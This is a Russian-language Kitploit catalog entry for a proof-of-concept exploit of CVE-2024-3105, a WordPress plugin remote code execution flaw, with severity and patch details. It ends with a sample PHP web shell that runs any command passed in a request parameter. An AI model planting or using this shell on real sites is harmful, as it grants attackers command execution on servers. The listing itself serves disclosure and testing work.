Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3105-PoC — PoC-эксплойт для CVE-2024-3105 - Woody code snippets – Insert Header Footer Code, AdSense Ads плагин для WordPress: удаленное выполнение кода (RCE) | Kitploit
Инструменты/GitHubGitHub/hunthubspace/cve-2024-3105-poc
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubhunthubspace/cve-2024-3105-poc

CVE-2024-3105-PoC

PoC-эксплойт для CVE-2024-3105 - Woody code snippets – Insert Header Footer Code, AdSense Ads плагин для WordPress: удаленное выполнение кода (RCE)

РепозиторийСайт
2132 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3105 (PoC)

Плагин Woody Code Snippets – Insert Header Footer Code, AdSense Ads для WordPress уязвим к удаленному выполнению кода во всех версиях до 2.5.0 включительно через шорткод 'insert_php'. Это связано с тем, что плагин не ограничивает использование этой функциональности только для авторизованных пользователей с высоким уровнем доступа. Это позволяет аутентифицированным злоумышленникам с уровнем доступа "contributor" и выше выполнять код на сервере.

Информация

Базовая оценка: 9.9 КРИТИЧЕСКИЙ
Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Тип ПО: Плагин
Слаг ПО: insert-php
Устранение: Обновитесь до версии 2.5.1 или более новой исправленной версии
Затронутая версия: <= 2.5.0

Пример PHP-кода

root@kitploit:~
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
Скачать инструмент